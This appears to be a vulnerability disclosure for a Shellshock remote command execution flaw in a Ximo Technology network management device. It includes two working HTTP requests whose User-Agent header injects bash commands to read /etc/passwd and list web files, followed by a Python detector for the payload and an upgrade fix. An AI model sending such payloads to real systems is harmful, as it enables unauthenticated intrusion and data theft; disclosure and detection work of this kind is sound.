The remote command execution vulnerability of the internet behavior management device of Ximo Technology (No Logon required)
Someone submitted this system two days ago:
http://**.**.**.**/bugs/wooyun-2016-0168680

Testing **.**.**.**:82/index.php/user/login turned up the following URL, which is affected by the bash vulnerability. Proof as follows:

**.**:82/cgi-bin/rate.cgi

0x00: Run cat /etc/passwd by sending the following request:

GET /cgi-bin/rate.cgi HTTP/1.1
Host: **.**.**.**
Accept-Encoding: gzip,deflate
User-Agent: () { :;}; echo `/bin/cat /etc/passwd`
Connection: Close
Accept: */*

0x01: Run ls -al /xmacg/web/ by sending the following request:

GET /cgi-bin/rate.cgi HTTP/1.1
Host: **.**.**.**
Accept-Encoding: gzip,deflate
User-Agent: () { :;}; echo `/bin/ls -al /xmacg/web/`
Connection: Close
Accept: */*
/bin/cat /etc/passwd
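The two requests above carry the bash function-definition prefix "() {" in the User-Agent header, which is what the affected CGI handler passes into the environment of a bash child process. A defender watching for this device being probed can flag that prefix in any request header before it reaches the CGI script. The following detector is an added example written for this page, not code from the report or from the vendor; the hostname "target.example" and the sample requests are constructed here to mirror the ones shown above.

```python
import re
from typing import Dict, List, Tuple

# Bash environment-variable function-definition prefix: "()" then "{".
# Matching the prefix rather than a specific command catches payload variants
# (any command after the closing "};" would still be flagged).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample requests in the shape of the ones in this report
# (hostname is a placeholder, not the redacted real target).
SAMPLE_REQUESTS = [
    "GET /cgi-bin/rate.cgi HTTP/1.1\r\nHost: target.example\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "User-Agent: () { :;}; echo `/bin/cat /etc/passwd`\r\n"
    "Connection: Close\r\nAccept: */*\r\n\r\n",
    # Benign request: parentheses in a normal User-Agent must not trigger.
    "GET /cgi-bin/rate.cgi HTTP/1.1\r\nHost: target.example\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "Accept: */*\r\n\r\n",
]


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (request line, {header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock_headers(raw: str) -> List[str]:
    """Return the (lower-cased) names of headers carrying the "() {" prefix."""
    _, headers = parse_request(raw)
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


def scan(requests: List[str]) -> List[Tuple[str, List[str]]]:
    """Flag each request whose headers carry a bash function-definition payload."""
    findings = []
    for raw in requests:
        request_line, _ = parse_request(raw)
        hits = find_shellshock_headers(raw)
        if hits:
            findings.append((request_line, hits))
    return findings


if __name__ == "__main__":
    for request_line, hdrs in scan(SAMPLE_REQUESTS):
        print(f"ALERT {request_line}: payload in header(s) {', '.join(hdrs)}")
```

The same check can be applied to any header the CGI handler exports into the environment, not only User-Agent, which is why the scan walks all headers rather than one.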
Solution:
Upgrade